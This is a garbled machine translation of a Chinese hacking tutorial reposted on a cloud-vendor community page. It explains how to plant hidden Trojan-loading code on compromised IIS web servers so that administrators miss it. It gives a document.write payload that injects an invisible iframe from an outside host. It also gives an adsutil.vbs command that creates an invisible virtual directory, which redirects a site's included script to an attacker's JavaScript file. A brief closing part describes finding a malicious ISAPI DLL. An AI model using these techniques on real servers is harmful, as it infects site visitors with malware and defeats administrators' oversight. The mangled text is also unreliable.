And in some foreign machines, what permissions have got to do not know how he did, nothing to write, not easy to write a file and then changed back, really let a person very!#$%%#%^#%^, it is said that there is a software can monitor important documents, once found that changes will be restored to the past, For example, if he watches the Web directory, we can't change anything on his website. However, read a lot of prawn articles, oneself also a little research, also finally pondering something out, do not have to write any file will be able to achieve the other people's page alteration and everyone often legends of the hanging horse, and so on, here for you to introduce, those who only know diligent administrator also must be careful!
As we all know, when we browse the site is the server will be information processing into HTML to return to us, and we want to achieve when customers visit can change their browser content, so that he concealed the implementation of our things such as Trojans and so on. The more common way is to introduce a frame, set properties so that he is not visible on the page, or not afraid of the death of the JavaScript jump, the more advanced point will use the original code HTML elements such as script tag or frame tag, Then tamper with other files or pages introduced in these tags, or change some of the database content to be displayed on the home page, such as modifying the bulletin in the database to implement hanging horses. But these need to add something in the original server code or modify the content of the site, whether it is across the station or directly modify the original code, which is extremely easy to find things, encounter a diligent administrator, your things on the server will not stay long! There is if some pages are not writable we are also very depressed, so it is necessary to find a more covert and more secure way of hanging horse to solve the above problems!
Let's take a look at the IIS Manager first! Select a page to see his properties as shown in Figure I. Oh, there is a resource redirect it! If we redirect this page selection to a page that we already control then when the browser requests this page, it will turn to the page we have defined, if the page is a Trojan horse? It's obvious that the visitor will be put on the horse! This is a simple way to change the redirection of the page in IIS only! Anyone who has access to the IIS Manager can do it easily! But there's still a problem! If the administrator found that the page has always been jump, check the site's files and use backup methods to restore or not solve the problem, he will certainly go to the IIS to see! Inadvertently see the main Page properties will find out where there are problems and then can be changed back!
So let's go ahead and see if there's a more hidden way! With the help of the former horse-hanging method, since the main page is easy to find, then look at the main page of the HTML tag it! If you find that there is a call to other pages would be good to do! For example, inside the home page there is a mark:
<script src=include/mm2.js></script>
Then we have a way, to modify the properties of Include/mms2.js! As shown in figure two, go to one of our pages, and of course the content should be explained in the script tag, such as:
document.write ("<8)") e Style=display:none; src=http://jnclovesw.com width=0 height=0></8)) e> ");
So we can introduce our page! Of course, it is best to realize his JS function first! That's enough to hide! Now the administrator will find that the home page has not changed, go to IIS to see the properties of the home page has not changed, even the host on any WWW files have not been modified, he will be very depressed bar! Oh! If he just to restore the previous site backup back is also no way to change the page back! IIS files so much he can't always look at the attributes in one. By the way, the problem is that the file you chose to redirect past must be able to be interpreted by quoting his HTML tags, otherwise it would be ineffective! For example, a you redirect 1.jpg to our Trojan page is no use, because the Trojan page is not interpreted as HTML, but sent to the IMG tag as a picture! I think of the use of the tag is also script and frame, as for CSS, I think it can be used, but the use of methods I have not found! I do not know whether I analyzed the right, you are welcome to advise Ah!
Let's go on! Assuming that if your administrator is tough or diligent, he finds out you've done something with Mm2.js, and he's going to get him back from IIS! Our dreams are shattered again! Is there a more covert approach? So the admin can't find it in IIS? The answer is YES! You must remember the IIS configuration vulnerability that you had a long time ago, you can create an invisible virtual directory, and then build a backdoor inside! We can also borrow to use Oh! The rationale for the IIS configuration vulnerability is to create a virtual directory without a physical directory so that it is not visible in IIS, and then you can do some tricks in this directory! Here we first create an invisible virtual directory, if the home page called the Include folder under the JS file, we set up the Include directory! This can be accomplished with the scripting of IIS, where the Adsutil.vbs script is under the IIS installation directory such as C:inetpubadminscripts, a script that controls IIS behavior, and the commands we use are as follows:
This creates a virtual directory that is not visible in IIS because the path is not set so it will not be displayed! Then in this directory to create a name called Mm2.js virtual directory, hehe! It is possible to create a virtual directory that can be used for a particular character:
So there is a include/mm2.js virtual directory! What do you have in mind? is not with the home page called that file name has been Oh! We're going to go down!
cscript adsutil.vbs set w3svc/1/root/www/include/mm2.js/httpredirect "Http://jnclovesw.com/mm1.js"
This is to change the redirection characteristics of the mm2.js virtual directory, as shown in Figure three. Note that the w3svc/1/root/www/represents the WWW virtual directory of the first Web server under IIS, and it is not clear that you can use the adsutil.vbs enum parameter to query the Web site that you want to change, and other actions can be opened Adsutil.vbs script help look! After this operation set the virtual directory redirection characteristics, now try to call Include/mm2.js on the home page, do you guess return mm2.js content or our mm1.js content? The answer is Mm1.js, as shown in Figure four, and the physical file still exists! This may be the nature of IIS! He first processes the user's request, and the virtual directory takes precedence over the physical file! Then we go to IIS to see if there are no include virtual directories! As shown in Figure Five, no! Oh! This allows us to successfully bypass the limits of permissions and administrator detection! Put our Trojan on the other side of the website, and unless the other party to redo IIS or delete our hidden virtual directory, otherwise he is very difficult to clear our Trojan!
The article is very simple, the key is the IIS script commands and some of the knowledge of IIS, this method of horse-hanging is suitable for the administrator to hang the horse, to deal with those who are only diligent administrator or very useful! Everyone later found that the site has problems remember to use this script to see if there is no problem oh! Or simply back up the IIS settings! Encounter problems to the IIS settings also restore, hehe!
2. The entire server hangs the horse the webpage source file but cannot find hangs the horse code
A server almost all Web sites open Web pages and even HTML pages have appeared
<8)) (E src= "http://xxxdfsfd/web.htm" height=0 width=0></8)) e>
This style of code generally in the head part of the anti-virus software Open will be reported poison
Open HTML or ASP PHP page in the source code can not find this piece
At first, I would suspect that JS is looking for a long time or not found that even the new HTML page will have this code ~
Looking for a problem, you should open IIS on IIS once again on primary IIS right-key property ISAPI found an ISAPI extension that was not seen
The path is: C:windowshelpwanps.dll isap load Normal green state
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.
